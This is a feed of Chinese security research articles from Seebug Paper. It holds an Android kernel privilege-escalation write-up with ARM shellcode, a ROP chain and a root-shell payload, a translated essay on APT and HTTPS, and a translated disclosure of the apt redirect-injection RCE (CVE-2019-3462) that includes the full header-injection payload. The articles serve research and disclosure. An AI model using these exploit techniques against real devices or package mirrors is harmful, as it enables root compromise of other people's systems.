<a class="token email-link" href="mailto:shell@generic">shell@generic</a><span class="token punctuation">:</span><span class="token operator">/</span> <span class="token comment"># id
</span>id
uid<span class="token operator">=</span><span class="token function">0<span class="token punctuation">(</span></span>root<span class="token punctuation">)</span> gid<span class="token operator">=</span><span class="token function">0<span class="token punctuation">(</span></span>root<span class="token punctuation">)</span> context<span class="token operator">=</span>u<span class="token punctuation">:</span>r<span class="token punctuation">:</span>kernel<span class="token punctuation">:</span>s0

Android 内核提权研究

环境能跑通以后,就来说说我的exp是怎么写出来的。

首先说一下,我的环境都是来源于AndroidKernelExploitationPlayground项目[3],但是实际测试的发现,该项目中依赖的估计是3.4的内核,但是现在的emulator要求内核版本大于等于3.10

从内核3.4到3.10有许多变化,首先,对内核的一些函数做了删减修改,所以需要改改驱动的代码,其次就是3.4的内核没有开PXN保护,在内核态可以跳转到用户态的内存空间去执行代码,所以该项目中给的exp是使用shellcode,但是在3.10内核中却开启了PXN保护,无法执行用户态内存中的shellcode

提权思路

搞内核Pwn基本都是一个目的——提权。那么在Linux在怎么把权限从普通用户变成特权用户呢?

一般提权的shellcode长这样:

asm
(
"    .text\n"
"    .align 2\n"
"    .code 32\n"
"    .globl shellCode\n\t"
"shellCode:\n\t"
// commit_creds(prepare_kernel_cred(0));
// -&gt; get root
"LDR     R3, =0xc0039d34\n\t"   //prepare_kernel_cred addr
"MOV     R0, #0\n\t"
"BLX     R3\n\t"
"LDR     R3, =0xc0039834\n\t"   //commit_creds addr
"BLX     R3\n\t"
"mov r3, #0x40000010\n\t"
"MSR    CPSR_c,R3\n\t"
"LDR     R3, =0x879c\n\t"     // payload function addr
"BLX     R3\n\t"
);

这个shellcode提权的思路有三步:

  1. prepare_kernel_cred(0) 创建一个特权用户cred
  2. commit_creds(prepare_kernel_cred(0)); 把当前用户cred设置为该特权cred
  3. MSR CPSR_c,R3 从内核态切换回用户态(详情自己百度这句指令和CPSR寄存器)

切换回用户态后,当前程序的权限已经变为root,这时候就可以执行/bin/sh

再继续深入研究,就涉及到内核的三个结构体:

$ cat <span class="token punctuation">.</span><span class="token operator">/</span>arch<span class="token operator">/</span>arm<span class="token operator">/</span>include<span class="token operator">/</span><span class="token keyword">asm</span><span class="token operator">/</span>thread_info<span class="token punctuation">.</span>h
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token keyword">struct</span> thread_info <span class="token punctuation">{</span>
        <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
        <span class="token keyword">struct</span> task_struct      <span class="token operator">*</span>task<span class="token punctuation">;</span>          <span class="token comment">/* main task structure */</span>
       <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
$ cat <span class="token punctuation">.</span><span class="token operator">/</span>include<span class="token operator">/</span>linux<span class="token operator">/</span>sched<span class="token punctuation">.</span>h
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token keyword">struct</span> task_struct <span class="token punctuation">{</span>
        <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
        <span class="token keyword">const</span> <span class="token keyword">struct</span> cred __rcu <span class="token operator">*</span>real_cred<span class="token punctuation">;</span>
        <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
$ cat <span class="token punctuation">.</span><span class="token operator">/</span>include<span class="token operator">/</span>linux<span class="token operator">/</span>cred<span class="token punctuation">.</span>h
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token keyword">struct</span> cred <span class="token punctuation">{</span>
        atomic_t        usage<span class="token punctuation">;</span>
<span class="token property">#ifdef CONFIG_DEBUG_CREDENTIALS</span>
        atomic_t        subscribers<span class="token punctuation">;</span>    <span class="token comment">/* number of processes subscribed */</span>
        <span class="token keyword">void</span>            <span class="token operator">*</span>put_addr<span class="token punctuation">;</span>
        <span class="token keyword">unsigned</span>        magic<span class="token punctuation">;</span>
<span class="token property">#define CRED_MAGIC      0x43736564</span>
<span class="token property">#define CRED_MAGIC_DEAD 0x44656144</span>
#endif
        kuid_t          uid<span class="token punctuation">;</span>            <span class="token comment">/* real UID of the task */</span>
        kgid_t          gid<span class="token punctuation">;</span>            <span class="token comment">/* real GID of the task */</span>
        kuid_t          suid<span class="token punctuation">;</span>           <span class="token comment">/* saved UID of the task */</span>
        kgid_t          sgid<span class="token punctuation">;</span>           <span class="token comment">/* saved GID of the task */</span>
        kuid_t          euid<span class="token punctuation">;</span>           <span class="token comment">/* effective UID of the task */</span>
        kgid_t          egid<span class="token punctuation">;</span>           <span class="token comment">/* effective GID of the task */</span>
        kuid_t          fsuid<span class="token punctuation">;</span>          <span class="token comment">/* UID for VFS ops */</span>
        kgid_t          fsgid<span class="token punctuation">;</span>          <span class="token comment">/* GID for VFS ops */</span>
        <span class="token keyword">unsigned</span>        securebits<span class="token punctuation">;</span>     <span class="token comment">/* SUID-less security management */</span>
        kernel_cap_t    cap_inheritable<span class="token punctuation">;</span> <span class="token comment">/* caps our children can inherit */</span>
        kernel_cap_t    cap_permitted<span class="token punctuation">;</span>  <span class="token comment">/* caps we're permitted */</span>
        kernel_cap_t    cap_effective<span class="token punctuation">;</span>  <span class="token comment">/* caps we can actually use */</span>
        kernel_cap_t    cap_bset<span class="token punctuation">;</span>       <span class="token comment">/* capability bounding set */</span>
        kernel_cap_t    cap_ambient<span class="token punctuation">;</span>    <span class="token comment">/* Ambient capability set */</span>
<span class="token property">#ifdef CONFIG_KEYS</span>
        <span class="token keyword">unsigned</span> <span class="token keyword">char</span>   jit_keyring<span class="token punctuation">;</span>    <span class="token comment">/* default keyring to attach requested
                                         * keys to */</span>
        <span class="token keyword">struct</span> key __rcu <span class="token operator">*</span>session_keyring<span class="token punctuation">;</span> <span class="token comment">/* keyring inherited over fork */</span>
        <span class="token keyword">struct</span> key      <span class="token operator">*</span>process_keyring<span class="token punctuation">;</span> <span class="token comment">/* keyring private to this process */</span>
        <span class="token keyword">struct</span> key      <span class="token operator">*</span>thread_keyring<span class="token punctuation">;</span> <span class="token comment">/* keyring private to this thread */</span>
        <span class="token keyword">struct</span> key      <span class="token operator">*</span>request_key_auth<span class="token punctuation">;</span> <span class="token comment">/* assumed request_key authority */</span>
#endif
<span class="token property">#ifdef CONFIG_SECURITY</span>
        <span class="token keyword">void</span>            <span class="token operator">*</span>security<span class="token punctuation">;</span>      <span class="token comment">/* subjective LSM security */</span>
#endif
        <span class="token keyword">struct</span> user_struct <span class="token operator">*</span>user<span class="token punctuation">;</span>       <span class="token comment">/* real user ID subscription */</span>
        <span class="token keyword">struct</span> user_namespace <span class="token operator">*</span>user_ns<span class="token punctuation">;</span> <span class="token comment">/* user_ns the caps and keyrings are relative to. */</span>
        <span class="token keyword">struct</span> group_info <span class="token operator">*</span>group_info<span class="token punctuation">;</span>  <span class="token comment">/* supplementary groups for euid/fsgid */</span>
        <span class="token keyword">struct</span> rcu_head rcu<span class="token punctuation">;</span>            <span class="token comment">/* RCU deletion hook */</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>

每个进程都有一个单独thread_info结构体,我们来看看内核是怎么获取到每个进程的thread_info结构体的信息的:

<span class="token property">#define THREAD_SIZE             8192</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token keyword">static</span> <span class="token keyword">inline</span> <span class="token keyword">struct</span> thread_info <span class="token operator">*</span><span class="token function">current_thread_info<span class="token punctuation">(</span></span><span class="token keyword">void</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
        <span class="token keyword">register</span> <span class="token keyword">unsigned</span> <span class="token keyword">long</span> sp <span class="token keyword">asm</span> <span class="token punctuation">(</span><span class="token string">"sp"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token punctuation">(</span><span class="token keyword">struct</span> thread_info <span class="token operator">*</span><span class="token punctuation">)</span><span class="token punctuation">(</span>sp <span class="token operator">&amp;</span> <span class="token operator">~</span><span class="token punctuation">(</span>THREAD_SIZE <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

有点内核基础知识的应该知道,内核的栈是有大小限制的,在arm32中栈的大小是0x2000,而thread_info的信息储存在栈的最底部

所以,如果我们能获取到当前进程在内核中运行时的其中一个栈地址,我们就能找到thread_info,从而顺藤摸瓜得到cred的地址,如果能任意写内核,则可以修改cred的信息,从而提权

总得来说,内核提权其实只有一条路可走,就是修改cred信息,而commit_creds(prepare_kernel_cred(0));不过是内核提供的修改cred的函数罢了。

我们来通过gdb展示下cred数据:

$ <a class="token email-link" href="mailto:shell@generic">shell@generic</a><span class="token punctuation">:</span><span class="token operator">/</span> $ id
id
uid<span class="token operator">=</span><span class="token function">2000<span class="token punctuation">(</span></span>shell<span class="token punctuation">)</span> gid<span class="token operator">=</span><span class="token function">1007<span class="token punctuation">(</span></span>log<span class="token punctuation">)</span> context<span class="token operator">=</span>u<span class="token punctuation">:</span>r<span class="token punctuation">:</span>init_shell<span class="token punctuation">:</span>s0
<span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span><span class="token operator">--</span>

通过gdb可以获取到:$sp : 0xd415bf40

从而计算出栈底地址:0xd415a000

然后我们就能获取到thread_info的信息,然后得到task_struct的地址:0xd4d16680

接着我们查看task_struct的信息,得到了cred的地址:0xd4167780

gef<span class="token operator">&gt;</span> p <span class="token operator">*</span><span class="token punctuation">(</span>struct task_struct <span class="token operator">*</span><span class="token punctuation">)</span><span class="token number">0xd4d16680</span>
<span class="token property">$2</span> <span class="token operator">=</span> <span class="token punctuation">{</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
        real_cred <span class="token operator">=</span> <span class="token number">0xd4167780</span><span class="token punctuation">,</span> 
        cred <span class="token operator">=</span> <span class="token number">0xd4167780</span><span class="token punctuation">,</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token comment"># 数据太长了,就不截图了</span>

然后查看cred的信息:

把uid和gid的十六进制转换成十进制,发现就是当前进程的权限

使用ROP绕过PXN来进行android提权

既然我们已经知道了怎么修改权限,那么接下来就研究一下如何利用漏洞来提权,因为是研究利用方式,所以自己造了一个最基础的栈溢出

<span class="token keyword">int</span> <span class="token function">proc_entry_write<span class="token punctuation">(</span></span><span class="token keyword">struct</span> file <span class="token operator">*</span>file<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> __user <span class="token operator">*</span>ubuf<span class="token punctuation">,</span> <span class="token keyword">unsigned</span> <span class="token keyword">long</span> count<span class="token punctuation">,</span> <span class="token keyword">void</span> <span class="token operator">*</span>data<span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token keyword">char</span> buf<span class="token punctuation">[</span>MAX_LENGTH<span class="token punctuation">]</span><span class="token punctuation">;</span>

    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">copy_from_user<span class="token punctuation">(</span></span><span class="token operator">&amp;</span>buf<span class="token punctuation">,</span> ubuf<span class="token punctuation">,</span> count<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token function">printk<span class="token punctuation">(</span></span>KERN_INFO <span class="token string">"stackBufferProcEntry: error copying data from userspace\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token operator">-</span>EFAULT<span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
    <span class="token keyword">return</span> count<span class="token punctuation">;</span>
<span class="token punctuation">}</span>

因为开了PXN,所以没办法使用shellcode,然后我第一个想到的思路就是使用ROP来执行shellcode的操作

这里说一下,不要使用ROPgadget,用这个跑内核的ELF,要跑贼久,推荐使用ROPPER[4]

$ ropper <span class="token operator">-</span>f <span class="token operator">/</span>mnt<span class="token operator">/</span>hgfs<span class="token operator">/</span>tmp<span class="token operator">/</span>android_kernel<span class="token operator">/</span>ranchu_3<span class="token punctuation">.</span>10_vmlinux <span class="token operator">--</span>nocolor <span class="token operator">&gt;</span> ranchu_ropper_gadget

然后就是找commit_credsprepare_kernel_cred这两个函数的地址,在没有开启kalsr的内核中,我们可以直接把vmlinux丢到ida里面,找这两个函数的地址

到这里,我们可以构造出如下的rop链:

*pc++ = 0x41424344;      // r4
*pc++ = 0xC00B8D68;      // ; mov r0, #0; pop {r4, pc}
*pc++ = 0x41424344;      // r4
*pc++ = 0xC00430F4;      // ; prepare_kernel_cred(0) -&gt; pop {r3-r5, pc}
*pc++ = 0x41424344;      // r3
*pc++ = 0x41424344;      // r4
*pc++ = 0x41424344;      // r5
*pc++ = 0xC0042BFC;      // ; commit_creds -&gt; pop {r4-r6, pc}
*pc++ = 0x41424344;      // r4
*pc++ = 0x41424344;      // r5
*pc++ = 0x41424344;      // r6

在成功修改当前进程的权限之后,我们需要把当前进程从内核态切换回用户态,然后在用户态执行/bin/sh,就能提权成功了

但是这里遇到一个问题,在shellcode中,使用的是:

"mov r3, #0x40000010\n\t"
"MSR    CPSR_c,R3\n\t"
"LDR     R3, =0x879c\n\t"     // payload function addr
"BLX     R3\n\t"

我也很容易能找到gadget: msr cpsr_c, r4; pop {r4, pc};

但是却没法成功切换回用户态,网上相关的资料几乎没有,我也找不到问题的原因,在执行完msr cpsr_c, r4指令以后,栈信息会发现变化,导致没法控制pc的跳转

不过后来,我跟踪内核的执行,发现内核本身是通过ret_fast_syscall函数来切换回用户态的:

$ cat ./arch/arm/kernel/entry-common.S
......
ret_fast_syscall:
 UNWIND(.fnstart        )
 UNWIND(.cantunwind     )
        disable_irq                             @ disable interrupts
        ldr     r1, [tsk, #TI_FLAGS]
        tst     r1, #_TIF_WORK_MASK
        bne     fast_work_pending
        asm_trace_hardirqs_on

        /* perform architecture specific actions before user return */
        arch_ret_to_user r1, lr
        ct_user_enter

        restore_user_regs fast = 1, offset = S_OFF
 UNWIND(.fnend          )
......
-----------------------------
   0xc000df80 &lt;ret_fast_syscall&gt;:   cpsid   i
   0xc000df84 &lt;ret_fast_syscall+4&gt;: ldr r1, [r9]
   0xc000df88 &lt;ret_fast_syscall+8&gt;: tst r1, #7
   0xc000df8c &lt;ret_fast_syscall+12&gt;: bne 0xc000dfb0 &lt;fast_work_pending&gt;
   0xc000df90 &lt;ret_fast_syscall+16&gt;:    ldr r1, [sp, #72]   ; 0x48
   0xc000df94 &lt;ret_fast_syscall+20&gt;:    ldr lr, [sp, #68]!  ; 0x44
   0xc000df98 &lt;ret_fast_syscall+24&gt;:    msr SPSR_fsxc, r1
   0xc000df9c &lt;ret_fast_syscall+28&gt;:    clrex
   0xc000dfa0 &lt;ret_fast_syscall+32&gt;: ldmdb  sp, {r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, r12, sp, lr}
   0xc000dfa4 &lt;ret_fast_syscall+36&gt;:    nop; (mov r0, r0)
   0xc000dfa8 &lt;ret_fast_syscall+40&gt;:    add sp, sp, #12
   0xc000dfac &lt;ret_fast_syscall+44&gt;:    movs    pc, lr

经过我测试发现,使用msr SPSR_fsxc, r1可以成功从内核态切换回用户态,但是该指令却只存在于该函数之前,无法找到相关的gadget,之后我想了很多利用该函数的方法,最后测试成功的方法是:

计算有漏洞的溢出函数的栈和ret_fast_syscall函数栈的距离,在使用ROP执行完commit_creds(prepare_kernel_cred(0));之后,使用合适的gadget来修改栈地址(比如: add sp, sp, #0x30; pop {r4, r5, r6, pc};),然后控制pc跳转到0xc000df90 <ret_fast_syscall+16>:,这样程序就相当于执行完了内核的syscall,然后切换回用户进程代码继续执行,在我们的用户态代码中后续执行如下函数,就能成功提权:

<span class="token keyword">void</span> <span class="token function">payload<span class="token punctuation">(</span></span><span class="token keyword">void</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>        
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">getuid<span class="token punctuation">(</span></span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">0</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token function">execl<span class="token punctuation">(</span></span><span class="token string">"/system/bin/sh"</span><span class="token punctuation">,</span> <span class="token string">"sh"</span><span class="token punctuation">,</span> NULL<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
                <span class="token function">warnx<span class="token punctuation">(</span></span><span class="token string">"failed to get root. How did we even get here?"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token function">_exit<span class="token punctuation">(</span></span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>

完整exp可以见我的Github。

ROP只是其中一种利用方法,后续还会研究其他利用方法和在64位android下的利用。

参考

  1. https://android.googlesource.com/kernel/goldfish/
  2. https://developer.android.com/studio/?hl=zh-cn#downloads
  3. https://github.com/Fuzion24/AndroidKernelExploitationPlayground
  4. https://github.com/sashs/Ropper

Paper本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/808/

News stories from Thursday 24 January, 2019

Favicon for 知道创宇 15:52 APT 为什么不使用 HTTPS 协议? » Post from 知道创宇 Visit off-site link

原文:Why does APT not use HTTPS?
作者:Chris Lamb
译者:Nanako@知道创宇404实验室

(这篇文章代表了一段时间前,特别是在CVE-2019-3462之前的情形。它并不代表我的个人意见,也不代表Debian / Ubuntu。)

tl;dr

https用于防止入侵者窃听到您与您访问的网站之间的通信,以及避免在您不知情的情况下修改数据。

然而,通过APT命令获取的文件往往都有自己的签名以通过系统的检查。

您的计算机根据一组已存储的可信密钥检查这些签名。如果缺少有效签名或者密钥不可信[1],则APT会拒绝下载该文件。这样可以确保您安装的软件来自您的授权,并且未被修改或替换。

如果下载服务器的磁盘上软件包发生了恶意篡改,https是无法检测出来的。因此也没有必要“安全的”传输一个受损的软件包。

隐私

https通常不会为获取数据包提供重要的私密性。由于窃听者通常可以看到您正在通信连接的主机,如果您正与发布镜像的网络进行连接,则很明显您在进行下载更新。

此外,即使通信是经过加密的,也不难根据传输大小确定要下载的文件[2]。因此,https只适用于从那些提供类似的,或大小相同的包的服务器上进行下载。

其实更应该关注的问题并不是加密,而是确保您正在安装的文件未被修改过。

过度信任CA

有超过400个“证书颁发机构”可以为任何域颁发证书,其中很多证书机构没有有效的安全记录,还有一些明确被政府控制[3]。

这意味着https对于发布镜像网络上的攻击目标提供了微乎其微的保护,甚至没有任何保护。您可以限制APT可以接收的有效证书集合,但这容易产生错误,对现有的公钥方案来说某些额外的麻烦是不值得的。

为什么不提供HTTPS呢?

您所用的发行版可以使用现有方案对文件进行加密签名,另外还可以通过https为文件提供“深度防御”。

然而,通过SSL提供一个巨大的全球镜像网络不仅是一项复杂的工程任务(需要私钥的安全交换和存储)。如上所述,它意味着会对最终用户的安全性和隐私级别产生误导性。

切换到https还意味着您无法利用本地代理服务器来加快访问速度,而且还将禁止多种类型的P2P 镜像,其中文件存储在不受您分发控制的服务器上。这将对远程区域的用户产生不同程度的影响。

重放攻击

简单签名机制存在的问题是,它不能保证您看到的是最新版本的存档。

这可能会导致重放攻击,攻击者将存档替换为较早的未经修改的版本,阻止APT注意到那些会被利用的安全更新。

为了解决这个问题,APT存档包含一个时间戳,在此时间戳之后的所有文件都被认作是旧文件[4]。

更多信息

SecureAPT wiki页面上可以找到更多技术细节?。

脚注

  1. 显示发布:无法验证以下签名,因为公钥不可用。
  2. 如果通过(假设)apt-transport-tor使用Tor,甚至有可能出现这种情况。
  3. 例如,请参阅在StackOverflow上的我应该信任哪些受信任的root证书颁发机构
  4. 请参阅Debian Wiki上DebianRepository页面的Date,Valid-Until部分

 

 

Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/803/

Favicon for 知道创宇 09:59 apt apt-get 中的远程执行代码 » Post from 知道创宇 Visit off-site link View media (video/mp4)

原文:Remote Code Execution in apt/apt-get
作者:Max Justicz
译者:Nanako@知道创宇404实验室

TL,DR:
我在apt中发现了一个漏洞,它允许网络中间人(或恶意包镜像)以root身份在安装软件包的机器上执行任意代码。该漏洞已在apt最新版本中被修复。如果您担心在更新过程中被利用,可以通过禁用http重定向来保护自己。为此,请运行:

$ sudo apt update -o Acquire::http::AllowRedirect=false

$ sudo apt upgrade -o Acquire::http::AllowRedirect=false

如果当前镜像包在默认情况下重定向(意味着出现该标志时无法更新apt),则需要选择其它镜像或直接下载程序包。该链接可以找到有关Debian升级的具体说明。Ubuntu的声明可以在这里找到。

作为证明,我录制了一段攻击如下Dockerfile的视频:

FROM debian:latest

RUN apt-get update &amp;&amp; apt-get install -y cowsay

背景

在获取数据时,apt将各种不同的数据传输协议的工作进程分离。然后,父进程通过stdin/stdout与这些工作人员进行通信, 利用一个类似http的协议告诉他们要下载的内容并将它放到文件系统上。例如,在一台机器上运行 apt install cowsay并用http请求下载相应包的时候,apt将提供/usr/lib/apt/methods/http目录,并返回100 Capabilities消息:

100 Capabilities

Version: 1.2

Pipeline: true

Send-Config: true

然后,父进程发送其配置并请求资源,如下所示:

601 Configuration

Config-Item: APT::Architecture=amd64

Config-Item: APT::Build-Essential::=build-essential

Config-Item: APT::Install-Recommends=1

(...many more lines omitted...)

600 URI Acquire

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Filename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.deb

Expected-SHA256: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831

Expected-MD5Sum: 27967ddb76b2c394a0714480b7072ab3

Expected-Checksum-FileSize: 20070

然后工作进程会像下方这样响应:

102 Status

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Message: Connecting to prod.debian.map.fastly.net

102 Status

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Message: Connecting to prod.debian.map.fastly.net (2a04:4e42:8::204)

102 Status

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Message: Waiting for headers

200 URI Start

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Size: 20070

Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000

201 URI Done

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

Filename: /var/cache/apt/archives/partial/cowsay_3.03+dfsg2-3_all.deb

Size: 20070

Last-Modified: Tue, 17 Jan 2017 18:05:21 +0000

MD5-Hash: 27967ddb76b2c394a0714480b7072ab3

MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3

SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831

Checksum-FileSize-Hash: 20070

当http服务器根据重定向进行响应时,工作进程返回103 Redirect而非201 URI Done。父进程根据此响应来确定接下来应该请求的资源:

103 Redirect

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

New-URI: http://example.com/new-uri

漏洞

不幸的是,进行http下载的进程会对HTTP Location头进行url解码,并直接附加到103 Redirect响应中:

// From methods/basehttp.cc
NextURI = DeQuoteString(Req.Location);
...
Redirect(NextURI);

// From apt-pkg/acquire-method.cc
void pkgAcqMethod::Redirect(const string &amp;NewURI)
{
   std::cout &lt;&lt; "103 Redirect\nURI: " &lt;&lt; Queue-&gt;Uri &lt;&lt; "\n"
             &lt;&lt; "New-URI: " &lt;&lt; NewURI &lt;&lt; "\n"
             &lt;&lt; "\n" &lt;&lt; std::flush;
   Dequeue();
}

(注意:不同版本的apt之间存在重要差异。上述代码来自Debian最近使用的1.4.y版本。一些Ubuntu版本使用的是1.6.y,它不仅仅是直接附加URI。然而在后续的http提取程序发出的600 URI Acquire请求中仍然存在注入漏洞。其他版本我并没有做检查。)

因此,如果http服务器发送Location: /new-uri%0AFoo%3A%20Bar,http提取进程将回复以下内容:

103 Redirect

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

New-URI: http://deb.debian.org/new-uri

Foo: Bar

或者,如果http服务器发送:

Location: /payload%0A%0A201%20URI%20Done%0AURI%3A%20http%3A//deb.debian.org/payload%0AFilename%3A%20/var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg%0ASize%3A%2020070%0ALast-Modified%3A%20Tue%2C%2007%20Mar%202017%2000%3A29%3A01%20%2B0000%0AMD5-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0AMD5Sum-Hash%3A%2027967ddb76b2c394a0714480b7072ab3%0ASHA256-Hash%3A%20858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831%0AChecksum-FileSize-Hash%3A%2020070%0A

那么http提取进程会回复:

103 Redirect

URI: http://deb.debian.org/debian/pool/main/c/cowsay/cowsay_3.03+dfsg2-3_all.deb

New-URI: http://deb.debian.org/payload

201 URI Done

URI: http://deb.debian.org/payload

Filename: /var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg

Size: 20070

Last-Modified: Tue, 07 Mar 2017 00:29:01 +0000

MD5-Hash: 27967ddb76b2c394a0714480b7072ab3

MD5Sum-Hash: 27967ddb76b2c394a0714480b7072ab3

SHA256-Hash: 858d5116a60ba2acef9f30e08c057ab18b1bd6df5ca61c233b6b7492fbf6b831

Checksum-FileSize-Hash: 20070

注入恶意包

因为我在我的验证程序中注入201 URI Done响应,所以我不得不处理没有下载任何包的问题。我需要一种方法让恶意的.deb进入系统,以便在Filename参数中使用。

为了实现这点,我利用了apt updaterelease.gpg文件具有可塑性,并安装在可预测的位置这个特点。具体来说,Release.gpg包含的PGP签名,如下所示:

-----BEGIN PGP SIGNATURE-----

...

-----END PGP SIGNATURE-----

只要注入的内容不接触到签名内容,apt的签名验证程序就不会报错,所以我拦截了release.gpg请求,并用我的恶意deb进行了预处理:

&lt;oops.deb contents&gt;

-----BEGIN PGP SIGNATURE-----

...

-----END PGP SIGNATURE-----

然后,我在201 URI Done响应中设置Filename参数:

/var/lib/apt/lists/deb.debian.org_debian_dists_stretch_Release.gpg

http / https争议

默认情况下,Debian和Ubuntu都使用开箱即用的http存储库(Debian允许您在安装过程中选择所需镜像,但实际上不支持https存储库 - 您必须先安装apt-transport-https)。

如果程序包清单已签名,为什么还要使用https?毕竟,由于包的大小有限,隐私获益是最小的。而且使用https会使缓存受限。

也有对此很感兴趣的人。某些网站专门解释为什么在apt上下文中使用https没有意义。

这些都是很好的观点,但是我这篇文章中的bug是存在的。无独有偶——这是JannHorn在2016年发现的另一个具有相同影响的bug。没错,即使使用的是https,恶意镜像依然可以利用这样的漏洞。但我觉得,与其攻击使用http或TLS证书的deb.debian.org,还不如直接攻击目标服务器上的应用服务。

(假设apt-transport-https本身没有灾难性的破坏。我并没有审计,但它看起来像是围绕libcurl的一个相对较薄的包装。)

支持http是个好事。我只是认为把https作为更安全的默认存储库是值得的,如果用户选择这样做的话,允许他们降低安全级别。如果服务器包默认使用的是https,我就无法利用本文顶部的dockerfile。

总结

感谢apt维护者及时修补此漏洞,并感谢Debian安全团队协助披露。这个漏洞已经注册编号:CVE-2019-3462。


 

Paper

本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/799/

Favicon for 知道创宇 09:56 多种设备基于 SNMP 协议的敏感信息泄露漏洞数据分析报告 » Post from 知道创宇 Visit off-site link

作者:知道创宇404实验室
English version:https://paper.seebug.org/796/

1. 更新情况

2. 事件概述

